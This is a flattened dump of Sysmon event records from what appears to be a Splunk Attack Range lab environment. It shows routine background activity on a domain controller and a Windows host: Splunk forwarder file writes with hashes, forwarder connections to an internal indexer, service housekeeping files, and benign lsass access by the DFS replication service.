14:19:53.621{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D00D633C1BF3EB30AA126BFC887C7D0A,SHA256=FD4FC280B9C7A37666238FF58ABDE40ACCBD72ED4293D100400FBA23708184DC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044580Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:54.795{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=556C8704CF16EACF4D868CB404B0FF58,SHA256=A20E7E26A77F5CE75558C9DFF9042E93D43AC447B6455F51ACB221763C1927B6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205615Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:54.667{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D59D46D71B42D97D27C804B9147E5722,SHA256=B4B0A24D57494B6541B34EE785FA966171C167858AB43865648BE5D4D164072E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044581Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:55.889{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2BC29B68831B0CF860611658F7CD0634,SHA256=CAEC2998E8BD416397410F570BA4F3522D49EBA303758E0A1E327F2137067FBC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205616Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:55.684{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=027B51E3EEF963970AE9B5133016F32F,SHA256=813F88F14963861DB6EAF4CB1687D0B9BFB92D68F363E5047D338CC478C2C615,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044583Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:56.983{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F3122D56D37FF2807AC728D85C60F026,SHA256=ADFA109C45A572D4DBBB6000FF5B2DA8C08560C0E8B7F9565A8CAD7578C47755,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205617Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:56.767{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5854EA745EB7EAD398083806B2DA49C9,SHA256=B7DBF9F8576C980F0145EDEB3084956CD3279D02EF4B33B6CB62C858C32DB80C,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000044582Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:53.679{0A5DF930-E3C7-6299-CE00-000000006002}1272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ct-attack-range-726.eu-central-1.compute.internal52365-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000205618Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:57.803{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EFD7553991A2D2EC8D9DBFD07DEABB7F,SHA256=0CA00E28A13086088AEB201A6C2D2AA78EBCF6CB49618AA712A093602E4A0D27,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205620Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:58.919{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=29783803EABAB16D3587A53CC00E196C,SHA256=6F429B0DBDCFBB6D022A0CEB0C3C766CCEA43344DDCA75F654A8ACEFB1938A39,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000205619Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:55.730{2E1864BB-E1C6-6299-D800-000000005F02}3988C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local56397-false10.0.1.12-8000- 23542300x800000000000000044584Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:58.077{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D0BD3605623DBEE6DE6163A70A37AD92,SHA256=BE8B4BEA8C58B9E0AECDB3950CC0EEDCBB34EA20E3328C7FC0F5257ABDE16FE0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205621Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:59.851{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DB543020E667DAFFC0A6C3B4F66F297B,SHA256=6F00EC34CCF86AFB145F4F807F80A322CC51A23A3B915E961C5D459ACFC0C10C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044585Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:59.170{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=28CC4C39E6350B96176F8355A6594F89,SHA256=0658E381E23F9EB93A3FD8C57AF94EB788CBD3F4AD18FEE2A2A285E5B2F6E33C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205623Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:00.936{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5968C12722D03E72A65928E6F31276EF,SHA256=AC44BF44FD27503D23405DA7E46FAAE9AEB29C48E0ECA98FB86E3C4832B07652,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000044587Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:58.757{0A5DF930-E3C7-6299-CE00-000000006002}1272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ct-attack-range-726.eu-central-1.compute.internal52366-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x800000000000000044586Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:00.264{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=738C6D46763DD64B444E373FE62A5458,SHA256=0686277F541BED1FE1171CE2CB9E3E6AEA97325A5298CBD315CD8DF1C8522224,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205622Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:00.836{2E1864BB-E13E-6299-1100-000000005F02}404NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=54643FDBC1DB88E138534DFF0DFD3C52,SHA256=F1B972C8913B2332B86A2C23753DCA26FC2841523A3F640D8A26BD1BAC835F67,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205624Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:01.984{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8760F91BDA6D9F373E57B3FDE3B2694F,SHA256=8DD36271795233B69DBFBCF8491E8823DEAD6225D5321B08D0198003CA6B5D9D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044588Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:01.358{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=474061E2174EA6C29E8FBDF658E69B08,SHA256=9499DCE2377C550A4B8B0C5CB2469045C31CECAC812C6CBD6B5DE196F843F775,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044590Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:02.748{0A5DF930-E35C-6299-1200-000000006002}1004NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=478E5AFE58CE7B939E43E297431AC739,SHA256=85FB4F99A4B151E48DB7F260431A4210D21FFBB1CA5DD3C6A60D7976DAA6C521,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044589Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:02.452{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0A09DC62996C1B1B0C941848A70A89E9,SHA256=FC8E6BD66D6ED445D8DDED1BEC83FABB636F6261384353F97292EB63FCCEDEBC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000205626Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:02.019{2E1864BB-E13C-6299-0B00-000000005F02}6364748C:\Windows\system32\lsass.exe{2E1864BB-E14E-6299-2F00-000000005F02}1280C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205625Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:02.019{2E1864BB-E13C-6299-0B00-000000005F02}6364748C:\Windows\system32\lsass.exe{2E1864BB-E14E-6299-2F00-000000005F02}1280C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044594Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:03.717{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1500-000000006002}1104C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044593Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:03.717{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1500-000000006002}1104C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044592Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:03.717{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1500-000000006002}1104C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000044591Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:03.545{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=402B640EA96FEFC016575D55EC949857,SHA256=550F5B58C0343E521A7E69FADDCD0664C18F6FB0378246CCE4E9B2E9C9B8C142,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000205629Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:01.632{2E1864BB-E13E-6299-0D00-000000005F02}912C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsetruefe80:0:0:0:fc03:c9e2:b068:9f71win-dc-ct-attack-range-304.attackrange.local56398-truefe80:0:0:0:fc03:c9e2:b068:9f71win-dc-ct-attack-range-304.attackrange.local135epmap 354300x8000000000000000205628Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:01.632{2E1864BB-E14E-6299-2F00-000000005F02}1280C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:fc03:c9e2:b068:9f71win-dc-ct-attack-range-304.attackrange.local56398-truefe80:0:0:0:fc03:c9e2:b068:9f71win-dc-ct-attack-range-304.attackrange.local135epmap 23542300x8000000000000000205627Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:03.086{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=56008A6B59942AE4EB08EA0476EEFED8,SHA256=97C212ECD3B31CB289D6B0B055A656E59482CCCA3AEF248BB806D312A50A2766,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044596Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:04.639{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DA53C046CDBB9AC482200DD227A12DA5,SHA256=644A7A2CE9869A90C44703BF5F5C9BA4951FD0D05682AD7411F3803B23B20D89,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000205631Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:01.714{2E1864BB-E1C6-6299-D800-000000005F02}3988C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local56399-false10.0.1.12-8000- 23542300x8000000000000000205630Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:04.187{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=23C534828C48387FA82B0259C678BB3D,SHA256=E52593F010E874D55D973639979F730C62639F99ADE417E754EBF2EB34FE581C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044595Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:04.233{0A5DF930-E3BE-6299-9D00-000000006002}2084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=88764E49A9DB40FAC84C143D55B11D16,SHA256=B6040902613D67A5E021D6B0ACAF400FECE55CE1FD86E9E8FC5C745130E83807,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044598Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:05.733{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E73BA62F00F0791B9291E8A8EACCA915,SHA256=196DBA916A913369D5FC2AA2582BDE39CB33A5AD73F59CF52DBBFDF0369B9C86,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205632Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:05.222{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D171A800237CBC1202DD5034BB1F5382,SHA256=2791D361BFD71B9B7C1EB75222EB3C951D3BB68E1DD525A88F0EF96B4BE1E670,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000044597Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:03.773{0A5DF930-E3BE-6299-9D00-000000006002}2084C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ct-attack-range-726.eu-central-1.compute.internal52367-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 23542300x800000000000000044600Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:06.827{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8A475A051EDC12CF1054D20A94BCD4AF,SHA256=007A001D4C630CA8BC4EA0E1FFD6DA8DC8591EAC9DA3C62ADD1B9E276B7B11BB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205633Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:06.338{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=69CB906898EC29F0B0BCE4DF962D4A29,SHA256=C505A7816AA7284A94A58F347BE744751CCBDB9A151CB94240A8BD1634B651E2,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000044599Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:04.773{0A5DF930-E3C7-6299-CE00-000000006002}1272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ct-attack-range-726.eu-central-1.compute.internal52368-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x800000000000000044601Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:07.920{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EE830DD5463BDF931293FE6DFF93B39A,SHA256=CBE30917B12BB20D010D10DB3156C51500F8362F9F1CCD58F20710BF8B9D09C6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205634Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:07.354{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=308E5535054BFECD7A86EB69C6190F0A,SHA256=20194F7A98B27C35561E7F54E11BDB899D5CED135BFBEBDEB3C9FF0CFB19A684,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205636Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:08.413{2E1864BB-E14E-6299-2800-000000005F02}2976NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-082954c374d9e9807\channels\health\respondent-20220603102417-229MD5=D22CF257E0732B5F4C22EC786659B3FF,SHA256=CD985CCC34CF20D24C2A0DD6C1AF3F982A03CB86FB6AC67C5C7E1BD670546944,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205635Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:08.386{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A93C3A7067AEA0A3F0E7B3B0064C85F4,SHA256=1C8E34AFAF131B45BF627A3A08933C8AA7C24212819C6904209099D1776FD709,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000205639Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:07.679{2E1864BB-E1C6-6299-D800-000000005F02}3988C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local56400-false10.0.1.12-8000- 23542300x8000000000000000205638Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:09.523{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 